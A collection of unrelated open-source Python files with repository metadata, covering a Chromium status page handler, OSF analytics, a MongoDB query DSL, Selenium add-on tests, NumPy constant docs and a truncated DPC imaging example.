@utils.requires_login
@utils.requires_write_access
def post(self):
"""Adds a new message."""
# We pass these variables back into get(), prepare them.
last_message = ''
error_message = ''
# Get the posted information.
new_message = self.request.get('message')
new_message = limit_length(new_message, 500)
last_status_key = self.request.get('last_status_key')
if not new_message:
# A submission contained no data. It's a better experience to redirect
# in this case.
self.redirect("/")
return
current_status = get_status()
if current_status and (last_status_key != str(current_status.key())):
error_message = ('Message not saved, mid-air collision detected, '
'please resolve any conflicts and try again!')
last_message = new_message
return self._handle(error_message, last_message)
else:
put_status(Status(message=new_message, username=self.user.email()))
self.redirect("/")
def bootstrap():
# Guarantee that at least one instance exists.
if db.GqlQuery('SELECT __key__ FROM Status').get() is None:
Status(username='none', message='welcome to status').put()
LinkableText.bootstrap(BasePage.IS_CHROMIUMOS)
|
{
"content_hash": "241c104e1caab19512d9b9320a101956",
"timestamp": "",
"source": "github",
"line_count": 453,
"max_line_length": 80,
"avg_line_length": 34.211920529801326,
"alnum_prop": 0.6395018712091883,
"repo_name": "nicko96/Chrome-Infra",
"id": "b6d7f9be8a27637a34620bda611bcc3cf4d9ad5c",
"size": "15682",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "appengine/chromium_status/appengine_module/chromium_status/status.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "100398"
},
{
"name": "Go",
"bytes": "648467"
},
{
"name": "HTML",
"bytes": "7323317"
},
{
"name": "JavaScript",
"bytes": "913960"
},
{
"name": "Makefile",
"bytes": "11281"
},
{
"name": "Protocol Buffer",
"bytes": "2730"
},
{
"name": "Python",
"bytes": "4034630"
},
{
"name": "Shell",
"bytes": "21687"
}
],
"symlink_target": ""
}
|
import os
import datetime
import collections
import tabulate
from modularodm import Q
from dateutil.relativedelta import relativedelta
from framework.analytics import get_basic_counters
from website import settings
from website.app import init_app
from website.models import User, PrivateLink
from website.addons.dropbox.model import DropboxUserSettings
from website.addons.osfstorage.model import OsfStorageFileRecord
from scripts.analytics import profile, tabulate_emails, tabulate_logs
def get_active_users():
return User.find(
Q('is_registered', 'eq', True) &
Q('password', 'ne', None) &
Q('is_merged', 'ne', True) &
Q('date_confirmed', 'ne', None)
)
def get_dropbox_metrics():
metrics = {
'enabled': [],
'authorized': [],
'linked': [],
}
for node_settings in DropboxUserSettings.find():
metrics['enabled'].append(node_settings)
if node_settings.has_auth:
metrics['authorized'].append(node_settings)
if node_settings.nodes_authorized:
metrics['linked'].append(node_settings)
return metrics
def get_private_links():
return PrivateLink.find(
Q('is_deleted', 'ne', True)
)
def count_user_nodes(users=None):
users = users or get_active_users()
return [
len(
user.node__contributed.find(
Q('is_deleted', 'eq', False) &
Q('is_folder', 'ne', True)
)
)
for user in users
]
def count_user_logs(user, query=None):
if query:
return len(user.nodelog__created.find(query))
return len(user.nodelog__created)
def count_users_logs(users=None, query=None):
users = users or get_active_users()
return [
count_user_logs(user, query)
for user in users
]
def count_at_least(counts, at_least):
return len([
count for count in counts
if count >= at_least
])
def count_file_downloads():
downloads_unique, downloads_total = 0, 0
for record in OsfStorageFileRecord.find():
page = ':'.join(['download', record.node._id, record.path])
unique, total = get_basic_counters(page)
downloads_unique += unique or 0
downloads_total += total or 0
return downloads_unique, downloads_total
LogCounter = collections.namedtuple('LogCounter', ['label', 'delta'])
log_counters = [
LogCounter('total', None),
LogCounter('last-3m', relativedelta(months=3)),
LogCounter('last-1m', relativedelta(months=1)),
LogCounter('last-1w', relativedelta(weeks=1)),
LogCounter('last-1d', relativedelta(days=1)),
]
log_thresholds = [1, 11]
def get_log_counts(users):
rows = []
for counter in log_counters:
counts = count_users_logs(
users,
(
Q('date', 'gte', datetime.datetime.utcnow() - counter.delta)
if counter.delta
else None
),
)
for threshold in log_thresholds:
thresholded = count_at_least(counts, threshold)
rows.append([
'logs-gte-{0}-{1}'.format(threshold, counter.label),
thresholded,
])
return rows
def main():
active_users = get_active_users()
dropbox_metrics = get_dropbox_metrics()
extended_profile_counts = profile.get_profile_counts()
private_links = get_private_links()
downloads_unique, downloads_total = count_file_downloads()
node_counts = count_user_nodes(active_users)
nodes_at_least_1 = count_at_least(node_counts, 1)
nodes_at_least_3 = count_at_least(node_counts, 3)
rows = [
['active-users', active_users.count()],
['dropbox-users-enabled', len(dropbox_metrics['enabled'])],
['dropbox-users-authorized', len(dropbox_metrics['authorized'])],
['dropbox-users-linked', len(dropbox_metrics['linked'])],
['profile-edits', extended_profile_counts['any']],
['view-only-links', private_links.count()],
['downloads-unique', downloads_unique],
['downloads-total', downloads_total],
['nodes-gte-1', nodes_at_least_1],
['nodes-gte-3', nodes_at_least_3],
]
rows.extend(get_log_counts(active_users))
table = tabulate.tabulate(
rows,
headers=['label', 'value'],
)
with open(os.path.join(settings.ANALYTICS_PATH, 'main.txt'), 'w') as fp:
fp.write(table)
tabulate_emails.main()
tabulate_logs.main()
if __name__ == '__main__':
init_app()
main()
|
{
"content_hash": "f33753b5375f18c1955e93b4af8d0017",
"timestamp": "",
"source": "github",
"line_count": 167,
"max_line_length": 76,
"avg_line_length": 27.34131736526946,
"alnum_prop": 0.6108190976784932,
"repo_name": "kushG/osf.io",
"id": "78748aa34f7c3e18b50963c79275e53f588137d8",
"size": "4607",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "scripts/analytics/benchmarks.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "74880"
},
{
"name": "HTML",
"bytes": "34349"
},
{
"name": "JavaScript",
"bytes": "839000"
},
{
"name": "Mako",
"bytes": "465890"
},
{
"name": "Python",
"bytes": "2490642"
},
{
"name": "Shell",
"bytes": "234"
}
],
"symlink_target": ""
}
|
from .spec import Equal, NotEqual, LessThan, LessThanEqual, GreaterThan, GreaterThanEqual, In, NotIn, \
Exists, Type, Where, UpdateSpecification, Mod, All, Size, Slice, QuerySpecification, Match
import types
import re
__all__ = ['Common', 'String', 'Number', 'List', 'Reference']
class _Base(object):
    def get_key(self, *args, **kwargs):
        raise NotImplementedError
    def _validate(self, *args, **kwargs):
        raise NotImplementedError
    def to_mongo(self, value):
        raise NotImplementedError
class Common(_Base):
def __eq__(self, other):
return self.eq(other)
def eq(self, other):
return Equal([self.get_key(), '', other])
def __ne__(self, other):
return self.ne(other)
def ne(self, other):
return NotEqual([self.get_key(), 'ne', other])
def __lt__(self, other):
return self.lt(other)
def lt(self, other):
return LessThan([self.get_key(), 'lt', other])
def __le__(self, other):
return self.lte(other)
def lte(self, other):
return LessThanEqual([self.get_key(), 'lte', other])
def __gt__(self, other):
return self.gt(other)
def gt(self, other):
return GreaterThan([self.get_key(), 'gt', other])
def __ge__(self, other):
return self.gte(other)
def gte(self, other):
return GreaterThanEqual([self.get_key(), 'gte', other])
def in_(self, vals):
return In([self.get_key(), 'in', vals])
def nin(self, vals):
return NotIn([self.get_key(), 'nin', vals])
def exists(self):
return Exists([self.get_key(), 'exists', True])
def type(self, type_):
return Type([self.get_key(), 'type', type_])
def where(self, javascript):
return Where([self.get_key(), 'where', javascript])
def rename(self):
raise NotImplementedError()
def set(self, val):
self._validate(val)
return UpdateSpecification(['set', self.get_key(True), self.to_mongo(val)])
def unset(self):
return UpdateSpecification(['unset', self.get_key(True), 1])
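# Illustrative sketch (not part of the original module): a minimal concrete
# field showing how Common's operators build query specifications. get_key,
# _validate and to_mongo are the hooks _Base expects subclasses to supply.
class _ExampleField(Common):
    def __init__(self, key):
        self._key = key
    def get_key(self, positional=False):
        return self._key
    def _validate(self, value):
        pass  # accept anything in this sketch
    def to_mongo(self, value):
        return value
# _ExampleField('age').gte(21) builds GreaterThanEqual(['age', 'gte', 21]).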
class String(_Base):
def startswith(self, value):
return self.re(r'^%s' % value)
def istartswith(self, value):
return self.ire(r'^%s' % value)
def endswith(self, value):
return self.re(r'%s$' % value)
def iendswith(self, value):
return self.ire(r'%s$' % value)
def contains(self, value):
return self.re(r'%s' % value)
def icontains(self, value):
return self.ire(r'%s' % value)
def re(self, pattern):
return Equal([self.get_key(), '', re.compile(pattern)])
def ire(self, pattern):
return Equal([self.get_key(), '', re.compile(pattern, re.IGNORECASE)])
class Number(_Base):
def __add__(self, val):
return self.inc(val)
def inc(self, val=1):
self._validate(val)
return UpdateSpecification(['inc', self.get_key(True), val])
def __sub__(self, val):
return self.dec(val)
def dec(self, val=1):
self._validate(val)
return UpdateSpecification(['inc', self.get_key(True), -val])
def __mod__(self, other):
class Proxy(object):
def __init__(self, field, a):
self.field = field
self.a = a
def __eq__(self, b):
return Mod([self.field.get_key(False), 'mod', [self.a, b]])
eq = __eq__
def __ne__(self, b):
return Mod([self.field.get_key(False), 'not mod', [self.a, b]])
ne = __ne__
return Proxy(self, other)
    def mod(self, a, b):
        return Mod([self.get_key(), 'mod', [a, b]])
class List(_Base):
def all(self, vals):
return All([self.get_key(), 'all', vals])
def size(self, size):
return Size([self.get_key(), 'size', size])
def match(self, *specs):
return Match([self.get_key(), 'elemMatch', specs])
def pop(self):
return UpdateSpecification(['pop', self.get_key(True), 1])
def popleft(self):
return UpdateSpecification(['pop', self.get_key(True), -1])
def __getitem__(self, key):
return self.slice(key)
def slice(self, key):
if isinstance(key, slice):
return Slice([self.get_key(), 'slice', [key.start, key.stop]])
return Slice([self.get_key(), 'slice', key])
def __or__(self, val):
return self.add_to_set(val)
def add_to_set(self, val):
self.field._validate(val)
return UpdateSpecification(['addToSet', self.get_key(True), self.field.to_mongo(val)])
def __add__(self, val):
if type(val) in [types.ListType, types.TupleType]:
return self.push_all(val)
else:
return self.push(val)
def push(self, val):
self.field._validate(val)
return UpdateSpecification(['push', self.get_key(True), self.field.to_mongo(val)])
def push_all(self, val):
if type(val) not in [types.ListType, types.TupleType]:
raise TypeError()
map(self.field._validate, val)
return UpdateSpecification(['pushAll', self.get_key(True), map(self.field.to_mongo, val)])
def __sub__(self, val):
if type(val) in [types.ListType, types.TupleType]:
return self.pull_all(val)
else:
return self.pull(val)
def pull(self, val):
if isinstance(val, QuerySpecification):
val = val.compile(self.get_key(True))
return UpdateSpecification(['pull', self.get_key(True), val])
def pull_all(self, val):
if type(val) not in [types.ListType, types.TupleType]:
raise TypeError()
return UpdateSpecification(['pullAll', self.get_key(True), val])
def replace_with(self, val):
self.field._validate(val)
return UpdateSpecification(['set', self.get_key(True) + '.$', self.field.to_mongo(val)])
def __mod__(self, val):
return self.replace_with(val)
class Reference(Common):
def eq(self, other):
return Common.eq(self, self.to_mongo(other))
def ne(self, other):
return Common.ne(self, self.to_mongo(other))
def lt(self, other):
return Common.lt(self, self.to_mongo(other))
def lte(self, other):
return Common.lte(self, self.to_mongo(other))
def gt(self, other):
return Common.gt(self, self.to_mongo(other))
def gte(self, other):
return Common.gte(self, self.to_mongo(other))
def in_(self, vals):
vals = [self.to_mongo(val) for val in vals]
return Common.in_(self, vals)
def nin(self, vals):
vals = [self.to_mongo(val) for val in vals]
return Common.nin(self, vals)
def set(self, val):
self._validate(val)
return Common.set(self, self.to_mongo(val))
|
{
"content_hash": "67228f5393fe86966900e956591806da",
"timestamp": "",
"source": "github",
"line_count": 250,
"max_line_length": 103,
"avg_line_length": 27.304,
"alnum_prop": 0.5754468209786112,
"repo_name": "GGOutfitters/conjure",
"id": "74147d3fadb99c26b37014cba766136ffce9220e",
"size": "6826",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "conjure/operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "148812"
}
],
"symlink_target": ""
}
|
import os
import zipfile
from selenium.webdriver.common.by import By
extensions = os.path.abspath("../../../../../../test/extensions/")
def test_install_uninstall_signed_addon_xpi(driver, pages):
extension = os.path.join(extensions, "webextensions-selenium-example.xpi")
id = driver.install_addon(extension)
assert id == "webextensions-selenium-example@example.com"
pages.load("blank.html")
injected = driver.find_element(By.ID, "webextensions-selenium-example")
assert injected.text == "Content injected by webextensions-selenium-example"
driver.uninstall_addon(id)
driver.refresh()
assert len(driver.find_elements(By.ID, "webextensions-selenium-example")) == 0
def test_install_uninstall_signed_addon_zip(driver, pages):
extension = os.path.join(extensions, "webextensions-selenium-example.zip")
id = driver.install_addon(extension)
assert id == "webextensions-selenium-example@example.com"
pages.load("blank.html")
injected = driver.find_element(By.ID, "webextensions-selenium-example")
assert injected.text == "Content injected by webextensions-selenium-example"
driver.uninstall_addon(id)
driver.refresh()
assert len(driver.find_elements(By.ID, "webextensions-selenium-example")) == 0
def test_install_uninstall_unsigned_addon_zip(driver, pages):
extension = os.path.join(extensions, "webextensions-selenium-example-unsigned.zip")
id = driver.install_addon(extension, temporary=True)
assert id == "webextensions-selenium-example@example.com"
pages.load("blank.html")
injected = driver.find_element(By.ID, "webextensions-selenium-example")
assert injected.text == "Content injected by webextensions-selenium-example"
driver.uninstall_addon(id)
driver.refresh()
assert len(driver.find_elements(By.ID, "webextensions-selenium-example")) == 0
def test_install_uninstall_signed_addon_dir(driver, pages):
zip = os.path.join(extensions, "webextensions-selenium-example.zip")
target = os.path.join(extensions, "webextensions-selenium-example")
with zipfile.ZipFile(zip, "r") as zip_ref:
zip_ref.extractall(target)
id = driver.install_addon(target)
assert id == "webextensions-selenium-example@example.com"
pages.load("blank.html")
injected = driver.find_element(By.ID, "webextensions-selenium-example")
assert injected.text == "Content injected by webextensions-selenium-example"
driver.uninstall_addon(id)
driver.refresh()
assert len(driver.find_elements(By.ID, "webextensions-selenium-example")) == 0
def test_install_uninstall_unsigned_addon_dir(driver, pages):
zip = os.path.join(extensions, "webextensions-selenium-example-unsigned.zip")
target = os.path.join(extensions, "webextensions-selenium-example-unsigned")
with zipfile.ZipFile(zip, "r") as zip_ref:
zip_ref.extractall(target)
id = driver.install_addon(target, temporary=True)
assert id == "webextensions-selenium-example@example.com"
pages.load("blank.html")
injected = driver.find_element(By.ID, "webextensions-selenium-example")
assert injected.text == "Content injected by webextensions-selenium-example"
driver.uninstall_addon(id)
driver.refresh()
assert len(driver.find_elements(By.ID, "webextensions-selenium-example")) == 0
|
{
"content_hash": "88bbd233067ecf57f4522f150cf80c53",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 87,
"avg_line_length": 37.86363636363637,
"alnum_prop": 0.7271908763505402,
"repo_name": "titusfortner/selenium",
"id": "0fdd9f8c688b8902bbe18ef5628b8d45d93bf0b1",
"size": "4120",
"binary": false,
"copies": "6",
"ref": "refs/heads/trunk",
"path": "py/test/selenium/webdriver/firefox/ff_installs_addons_tests.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ASP.NET",
"bytes": "825"
},
{
"name": "Batchfile",
"bytes": "4443"
},
{
"name": "C",
"bytes": "82917"
},
{
"name": "C#",
"bytes": "2989900"
},
{
"name": "C++",
"bytes": "2285448"
},
{
"name": "CSS",
"bytes": "1049"
},
{
"name": "Dockerfile",
"bytes": "1737"
},
{
"name": "HTML",
"bytes": "1379853"
},
{
"name": "Java",
"bytes": "6305900"
},
{
"name": "JavaScript",
"bytes": "2535570"
},
{
"name": "Makefile",
"bytes": "4655"
},
{
"name": "PowerShell",
"bytes": "213"
},
{
"name": "Python",
"bytes": "987676"
},
{
"name": "Ragel",
"bytes": "3086"
},
{
"name": "Ruby",
"bytes": "1038887"
},
{
"name": "Rust",
"bytes": "47487"
},
{
"name": "Shell",
"bytes": "29996"
},
{
"name": "Starlark",
"bytes": "399974"
},
{
"name": "TypeScript",
"bytes": "126843"
},
{
"name": "XSLT",
"bytes": "1047"
}
],
"symlink_target": ""
}
|
__all__ = ["Config"]
import __builtin__
from pandac.PandaModules import Filename
from ConfigParser import SafeConfigParser
APP_PATH = __builtin__.APP_PATH
class Config(SafeConfigParser):
def parse_into_object(self, object):
"""Parses the configuration file and sets the properties of the specified
object. Most likely this will be __builtin__."""
object.FULLSCREEN = self.getboolean("display", "fullscreen")
object.LOAD_DISPLAY = self.get("display", "framework").replace(" ", "").lower().replace("directx", "dx").replace("opengl", "gl")
        res = self.get("display", "resolution").strip().lower()
        if res in ["", "auto", "none", "keep", "current", "detect", "autodetect", "auto-detect"]:
            object.RESOLUTION = None
        else:
            object.RESOLUTION = (int(res.split("x")[0]), int(res.split("x")[1]))
        win_size = self.get("display", "windowSize").strip().lower()
        object.WIN_SIZE = (int(win_size.split("x")[0]), int(win_size.split("x")[1]))
object.SHOW_FPS = self.getboolean("performance", "showFpsMeter")
object.USE_CACHE = self.getboolean("performance", "useTextureCache")
object.INTERPOLATE_FRAMES = self.getboolean("performance", "interpolateFrames")
    def load(self, file_name=None):
        if file_name is None:
            self.readfp(open(self.make_filename().toOsSpecific()))
        elif isinstance(file_name, Filename):
            self.readfp(open(file_name.toOsSpecific()))
        else:
            raise TypeError("Invalid type for Config.load()!")
@classmethod
    def make_filename(cls):
"""Returns the filename that config files have on this platform."""
return Filename(APP_PATH + "config.conf")
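# Illustrative usage (a sketch, not part of the module): load the platform
# config file and push its settings onto __builtin__, as parse_into_object's
# docstring suggests.
#
#   config = Config()
#   config.load()                         # reads APP_PATH + "config.conf"
#   config.parse_into_object(__builtin__)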
|
{
"content_hash": "8e77177b0c2231960db19c2a8a01a918",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 165,
"avg_line_length": 46.30769230769231,
"alnum_prop": 0.6733111849390919,
"repo_name": "asceth/devsyn",
"id": "800dcc2179a703a22e3b78ca1c341b2a7a5704d5",
"size": "1806",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "devsyn/core/config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "73726"
}
],
"symlink_target": ""
}
|
"""
test_pypostman
----------------------------------
Tests for `pypostman` module.
"""
import unittest
from pypostman import pypostman
class TestPypostman(unittest.TestCase):
def setUp(self):
pass
def test_something(self):
pass
def tearDown(self):
pass
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "299c06577ad6b15dac0542d950e45673",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 39,
"avg_line_length": 13.8,
"alnum_prop": 0.5594202898550724,
"repo_name": "skalanux/pypostman",
"id": "fdd9675e4490d710557235207e1a8f16692e5b5e",
"size": "392",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_pypostman.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "13372"
},
{
"name": "Shell",
"bytes": "6466"
}
],
"symlink_target": ""
}
|
"""
=========
Constants
=========
.. currentmodule:: numpy
NumPy includes several constants:
%(constant_list)s
"""
#
# Note: the docstring is autogenerated.
#
import re
import textwrap
# Maintain same format as in numpy.add_newdocs
constants = []
def add_newdoc(module, name, doc):
constants.append((name, doc))
add_newdoc('numpy', 'pi',
"""
``pi = 3.1415926535897932384626433...``
References
----------
https://en.wikipedia.org/wiki/Pi
""")
add_newdoc('numpy', 'e',
"""
Euler's constant, base of natural logarithms, Napier's constant.
``e = 2.71828182845904523536028747135266249775724709369995...``
See Also
--------
exp : Exponential function
log : Natural logarithm
References
----------
https://en.wikipedia.org/wiki/E_%28mathematical_constant%29
""")
add_newdoc('numpy', 'euler_gamma',
"""
``γ = 0.5772156649015328606065120900824024310421...``
References
----------
https://en.wikipedia.org/wiki/Euler-Mascheroni_constant
""")
add_newdoc('numpy', 'inf',
"""
IEEE 754 floating point representation of (positive) infinity.
Returns
-------
y : float
A floating point representation of positive infinity.
See Also
--------
isinf : Shows which elements are positive or negative infinity
isposinf : Shows which elements are positive infinity
isneginf : Shows which elements are negative infinity
isnan : Shows which elements are Not a Number
isfinite : Shows which elements are finite (not one of Not a Number,
positive infinity and negative infinity)
Notes
-----
NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). This means that Not a Number is not equivalent to infinity.
Also that positive infinity is not equivalent to negative infinity. But
infinity is equivalent to positive infinity.
`Inf`, `Infinity`, `PINF` and `infty` are aliases for `inf`.
Examples
--------
>>> np.inf
inf
>>> np.array([1]) / 0.
array([ Inf])
""")
add_newdoc('numpy', 'nan',
"""
IEEE 754 floating point representation of Not a Number (NaN).
Returns
-------
y : A floating point representation of Not a Number.
See Also
--------
isnan : Shows which elements are Not a Number.
isfinite : Shows which elements are finite (not one of
Not a Number, positive infinity and negative infinity)
Notes
-----
NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). This means that Not a Number is not equivalent to infinity.
`NaN` and `NAN` are aliases of `nan`.
Examples
--------
>>> np.nan
nan
>>> np.log(-1)
nan
>>> np.log([-1, 1, 2])
array([ NaN, 0. , 0.69314718])
""")
add_newdoc('numpy', 'newaxis',
"""
A convenient alias for None, useful for indexing arrays.
See Also
--------
`numpy.doc.indexing`
Examples
--------
>>> newaxis is None
True
>>> x = np.arange(3)
>>> x
array([0, 1, 2])
>>> x[:, newaxis]
array([[0],
[1],
[2]])
>>> x[:, newaxis, newaxis]
array([[[0]],
[[1]],
[[2]]])
>>> x[:, newaxis] * x
array([[0, 0, 0],
[0, 1, 2],
[0, 2, 4]])
Outer product, same as ``outer(x, y)``:
>>> y = np.arange(3, 6)
>>> x[:, newaxis] * y
array([[ 0, 0, 0],
[ 3, 4, 5],
[ 6, 8, 10]])
``x[newaxis, :]`` is equivalent to ``x[newaxis]`` and ``x[None]``:
>>> x[newaxis, :].shape
(1, 3)
>>> x[newaxis].shape
(1, 3)
>>> x[None].shape
(1, 3)
>>> x[:, newaxis].shape
(3, 1)
""")
add_newdoc('numpy', 'NZERO',
"""
IEEE 754 floating point representation of negative zero.
Returns
-------
y : float
A floating point representation of negative zero.
See Also
--------
PZERO : Defines positive zero.
isinf : Shows which elements are positive or negative infinity.
isposinf : Shows which elements are positive infinity.
isneginf : Shows which elements are negative infinity.
isnan : Shows which elements are Not a Number.
isfinite : Shows which elements are finite - not one of
Not a Number, positive infinity and negative infinity.
Notes
-----
NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). Negative zero is considered to be a finite number.
Examples
--------
>>> np.NZERO
-0.0
>>> np.PZERO
0.0
>>> np.isfinite([np.NZERO])
array([ True])
>>> np.isnan([np.NZERO])
array([False])
>>> np.isinf([np.NZERO])
array([False])
""")
add_newdoc('numpy', 'PZERO',
"""
IEEE 754 floating point representation of positive zero.
Returns
-------
y : float
A floating point representation of positive zero.
See Also
--------
NZERO : Defines negative zero.
isinf : Shows which elements are positive or negative infinity.
isposinf : Shows which elements are positive infinity.
isneginf : Shows which elements are negative infinity.
isnan : Shows which elements are Not a Number.
isfinite : Shows which elements are finite - not one of
Not a Number, positive infinity and negative infinity.
Notes
-----
NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). Positive zero is considered to be a finite number.
Examples
--------
>>> np.PZERO
0.0
>>> np.NZERO
-0.0
>>> np.isfinite([np.PZERO])
array([ True])
>>> np.isnan([np.PZERO])
array([False])
>>> np.isinf([np.PZERO])
array([False])
""")
add_newdoc('numpy', 'NAN',
"""
IEEE 754 floating point representation of Not a Number (NaN).
`NaN` and `NAN` are equivalent definitions of `nan`. Please use
`nan` instead of `NAN`.
See Also
--------
nan
""")
add_newdoc('numpy', 'NaN',
"""
IEEE 754 floating point representation of Not a Number (NaN).
`NaN` and `NAN` are equivalent definitions of `nan`. Please use
`nan` instead of `NaN`.
See Also
--------
nan
""")
add_newdoc('numpy', 'NINF',
"""
IEEE 754 floating point representation of negative infinity.
Returns
-------
y : float
A floating point representation of negative infinity.
See Also
--------
isinf : Shows which elements are positive or negative infinity
isposinf : Shows which elements are positive infinity
isneginf : Shows which elements are negative infinity
isnan : Shows which elements are Not a Number
isfinite : Shows which elements are finite (not one of Not a Number,
positive infinity and negative infinity)
Notes
-----
NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). This means that Not a Number is not equivalent to infinity.
Also that positive infinity is not equivalent to negative infinity. But
infinity is equivalent to positive infinity.
Examples
--------
>>> np.NINF
-inf
>>> np.log(0)
-inf
""")
add_newdoc('numpy', 'PINF',
"""
IEEE 754 floating point representation of (positive) infinity.
Use `inf` because `Inf`, `Infinity`, `PINF` and `infty` are aliases for
`inf`. For more details, see `inf`.
See Also
--------
inf
""")
add_newdoc('numpy', 'infty',
"""
IEEE 754 floating point representation of (positive) infinity.
Use `inf` because `Inf`, `Infinity`, `PINF` and `infty` are aliases for
`inf`. For more details, see `inf`.
See Also
--------
inf
""")
add_newdoc('numpy', 'Inf',
"""
IEEE 754 floating point representation of (positive) infinity.
Use `inf` because `Inf`, `Infinity`, `PINF` and `infty` are aliases for
`inf`. For more details, see `inf`.
See Also
--------
inf
""")
add_newdoc('numpy', 'Infinity',
"""
IEEE 754 floating point representation of (positive) infinity.
Use `inf` because `Inf`, `Infinity`, `PINF` and `infty` are aliases for
`inf`. For more details, see `inf`.
See Also
--------
inf
""")
if __doc__:
constants_str = []
constants.sort()
for name, doc in constants:
s = textwrap.dedent(doc).replace("\n", "\n ")
# Replace sections by rubrics
lines = s.split("\n")
new_lines = []
for line in lines:
m = re.match(r'^(\s+)[-=]+\s*$', line)
if m and new_lines:
prev = textwrap.dedent(new_lines.pop())
new_lines.append('%s.. rubric:: %s' % (m.group(1), prev))
new_lines.append('')
else:
new_lines.append(line)
s = "\n".join(new_lines)
# Done.
constants_str.append(""".. data:: %s\n %s""" % (name, s))
constants_str = "\n".join(constants_str)
__doc__ = __doc__ % dict(constant_list=constants_str)
del constants_str, name, doc
del line, lines, new_lines, m, s, prev
del constants, add_newdoc
|
{
"content_hash": "188a8502af1a64d29a970b453bebd42b",
"timestamp": "",
"source": "github",
"line_count": 416,
"max_line_length": 75,
"avg_line_length": 22.129807692307693,
"alnum_prop": 0.5821203562893765,
"repo_name": "WarrenWeckesser/numpy",
"id": "2c629ad33da8d62a66f647d829021e42bcd45b80",
"size": "9231",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "numpy/doc/constants.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "9059444"
},
{
"name": "C++",
"bytes": "174989"
},
{
"name": "Fortran",
"bytes": "10884"
},
{
"name": "JavaScript",
"bytes": "16928"
},
{
"name": "Makefile",
"bytes": "4290"
},
{
"name": "Python",
"bytes": "8313055"
},
{
"name": "Shell",
"bytes": "9612"
},
{
"name": "sed",
"bytes": "5741"
}
],
"symlink_target": ""
}
|
from __future__ import with_statement
import sys
import os
from setuptools import setup
with open('README.rst') as file:
long_description = file.read()
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
setup(
name='ExEmGel',
version='0.5',
author = "Dave Collins",
author_email = "dave@hopest.net",
packages=['exemgel',],
license='MIT',
description = "Simple xml reader",
url = "https://github.com/thedavecollins/ExEmGel",
long_description=long_description,
classifiers=[
'Intended Audience :: Developers',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
"License :: OSI Approved",
"License :: OSI Approved :: MIT License",
"Topic :: Text Processing",
"Topic :: Text Processing :: Markup",
"Topic :: Text Processing :: Markup :: XML",
],
)
|
{
"content_hash": "1557bcd4b19a0a65e3759c9b8da35548",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 113,
"avg_line_length": 30.428571428571427,
"alnum_prop": 0.532394366197183,
"repo_name": "thedavecollins/ExEmGel",
"id": "d97532bbef8194cb7527c072dbd0808c197604f1",
"size": "1088",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8789"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
# Grammar
from arpeggio import ParserPython, Optional, EOF
def g(): return [Optional('first'), Optional('second'), Optional('third')], EOF
def test_optional_in_choice():
parser = ParserPython(g)
input_str = "second"
parse_tree = parser.parse(input_str)
assert parse_tree is not None
|
{
"content_hash": "e2d0c5a7d53830ad0fcac046694e7b96",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 82,
"avg_line_length": 26.615384615384617,
"alnum_prop": 0.6936416184971098,
"repo_name": "leiyangyou/Arpeggio",
"id": "de6484b65745a348e43548f53bbed98f0067b2cc",
"size": "827",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/unit/regressions/issue_20/test_issue_20.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "127973"
},
{
"name": "Ren'Py",
"bytes": "2016321"
},
{
"name": "Shell",
"bytes": "575"
}
],
"symlink_target": ""
}
|
"""
This is an example script utilizing dpc.py for Differential Phase Contrast
(DPC) imaging based on Fourier shift fitting.
This script requires a SOFC folder containing the test data in your home
directory. The default path for the results (texts and JPEGs) is also your home
directory. It will automatically download the data to your home directory if
you installed wget and unzip utilities. You can also manually download and
decompress the data at https://www.dropbox.com/s/963c4ymfmbjg5dm/SOFC.zip
Steps
-----
In this file:
1. Set parameters
2. Load the reference image
3. Save intermediate and final results
in skxray.dpc.dpc_runner:
1. Dimension reduction along x and y direction
2. 1-D IFFT
3. Same calculation on each diffraction pattern
3.1. Read a diffraction pattern
3.2. Dimension reduction along x and y direction
3.3. 1-D IFFT
3.4. Nonlinear fitting
4. Reconstruct the final phase image
"""
import os
from subprocess import call
import scipy
import numpy as np
import matplotlib.pyplot as plt
from pims import ImageSequence
import zipfile
from skxray.core import dpc
dpc.logger.setLevel(dpc.logging.DEBUG)
handler = dpc.logging.StreamHandler()
handler.setLevel(dpc.logging.DEBUG)
dpc.logger.addHandler(handler)
def load_image(filename):
"""
Load an image
Parameters
----------
filename : string
the location and name of an image
Return
----------
t : 2-D numpy array
store the image data
"""
if os.path.exists(filename):
t = plt.imread(filename)
else:
print('Please download and decompress the test data to your home directory\n\
